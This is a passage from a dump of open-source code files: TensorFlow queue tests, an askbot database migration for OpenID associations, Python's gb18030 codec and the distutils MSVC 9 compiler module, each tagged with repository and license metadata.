sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.test_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
| apache-2.0 |
jesonyang001/qarepo | askbot/deps/django_authopenid/migrations/0002_make_multiple_openids_possible.py | 17 | 9274 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from askbot.migrations import houston_do_we_have_a_problem
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserAssociation.provider_name'
db.add_column('django_authopenid_userassociation', 'provider_name', self.gf('django.db.models.fields.CharField')(default='unknown', max_length=64), keep_default=False)
# Removing unique constraint on 'UserAssociation', fields ['user']
if houston_do_we_have_a_problem('django_authopenid_userassociation'):
            # In MySQL+InnoDB, foreign keys must have some index on them, so
            # before deleting the UNIQUE index we first create an "ordinary" one.
db.create_index('django_authopenid_userassociation', ['user_id'])
db.delete_unique('django_authopenid_userassociation', ['user_id'])
# Adding unique constraint on 'UserAssociation', fields ['provider_name', 'user']
db.create_unique('django_authopenid_userassociation', ['provider_name', 'user_id'])
def backwards(self, orm):
# Deleting field 'UserAssociation.provider_name'
db.delete_column('django_authopenid_userassociation', 'provider_name')
# Adding unique constraint on 'UserAssociation', fields ['user']
db.create_unique('django_authopenid_userassociation', ['user_id'])
# Removing unique constraint on 'UserAssociation', fields ['provider_name', 'user']
db.delete_unique('django_authopenid_userassociation', ['provider_name', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'hide_ignored_questions': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'tag_filter_setting': ('django.db.models.fields.CharField', [], {'default': "'ignored'", 'max_length': '16'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'django_authopenid.association': {
'Meta': {'object_name': 'Association'},
'assoc_type': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'handle': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issued': ('django.db.models.fields.IntegerField', [], {}),
'lifetime': ('django.db.models.fields.IntegerField', [], {}),
'secret': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
'server_url': ('django.db.models.fields.TextField', [], {'max_length': '2047'})
},
'django_authopenid.externallogindata': {
'Meta': {'object_name': 'ExternalLoginData'},
'external_session_data': ('django.db.models.fields.TextField', [], {}),
'external_username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'django_authopenid.nonce': {
'Meta': {'object_name': 'Nonce'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'salt': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'server_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.IntegerField', [], {})
},
'django_authopenid.userassociation': {
'Meta': {'unique_together': "(('user', 'provider_name'),)", 'object_name': 'UserAssociation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'openid_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'provider_name': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'django_authopenid.userpasswordqueue': {
'Meta': {'object_name': 'UserPasswordQueue'},
'confirm_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_password': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['django_authopenid']
| gpl-3.0 |
liamgh/liamgreenhughes-sl4a-tf101 | python/src/Lib/encodings/gb18030.py | 816 | 1031 | #
# gb18030.py: Python Unicode Codec for GB18030
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('gb18030')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
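# getregentry() below is what the standard "encodings" package search function
# calls to register this codec the first time codecs.lookup('gb18030') runs.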
def getregentry():
return codecs.CodecInfo(
name='gb18030',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| apache-2.0 |
michalliu/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python2.7/distutils/msvc9compiler.py | 148 | 31018 | """distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
# Written by Perry Stoll
# hacked by Robin Becker and Thomas Heller to do a better job of
# finding DevStudio (through the registry)
# ported to VS2005 and VS 2008 by Christian Heimes
__revision__ = "$Id$"
import os
import subprocess
import sys
import re
from distutils.errors import (DistutilsExecError, DistutilsPlatformError,
CompileError, LibError, LinkError)
from distutils.ccompiler import CCompiler, gen_lib_options
from distutils import log
from distutils.util import get_platform
import _winreg
RegOpenKeyEx = _winreg.OpenKeyEx
RegEnumKey = _winreg.EnumKey
RegEnumValue = _winreg.EnumValue
RegError = _winreg.error
HKEYS = (_winreg.HKEY_USERS,
_winreg.HKEY_CURRENT_USER,
_winreg.HKEY_LOCAL_MACHINE,
_winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
VSEXPRESS_BASE = r"Software\Wow6432Node\Microsoft\VCExpress\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
VSEXPRESS_BASE = r"Software\Microsoft\VCExpress\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
# A map keyed by get_platform() return values to values accepted by
# 'vcvarsall.bat'. Note a cross-compile may combine these (e.g., 'x86_amd64' is
# the param to cross-compile on x86 targeting amd64.)
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler that can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
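# Worked example: with sys.version containing "MSC v.1500 64 bit (AMD64)",
# s == "1500", majorVersion == 15 - 6 == 9, minorVersion == 0.0, so the
# function returns 9.0 (the compiler shipped with Visual Studio 2008).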
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
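# For instance, on Windows ['C:\\VC\\', 'C:\\VC', 'C:\\SDK'] reduces to
# ['C:\\VC', 'C:\\SDK']: the trailing-slash duplicate collapses after
# normalization and the original order is preserved.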
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
First it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
productdir = None
# trying Express edition
if productdir is None:
vsbase = VSEXPRESS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
productdir = None
log.debug("Unable to find productdir in registry")
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
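# Usage sketch: find_vcvarsall(9.0) yields the absolute path of
# vcvarsall.bat for VS 2008 (or the Express edition), or None when neither
# the registry keys nor the VS90COMNTOOLS fallback point to a valid
# directory.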
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
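# Illustrative shape of the result (the paths are assumptions):
#     query_vcvarsall(9.0, 'x86')
#     # -> {'include': u'...', 'lib': u'...', 'libpath': u'...',
#     #     'path': u'C:\\VS9\\VC\\bin;C:\\Windows\\system32'}
# i.e. exactly the four "interesting" keys, each with duplicates removed.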
# More globals
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
# MACROS = MacroExpander(VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# initializing more than once would mean re-checking that the platform is the same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
# take care to only use strings in the environment.
self.__paths = vc_env['path'].encode('mbcs').split(os.pathsep)
os.environ['lib'] = vc_env['lib'].encode('mbcs')
os.environ['include'] = vc_env['include'].encode('mbcs')
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError, msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError, msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError, msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError, msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
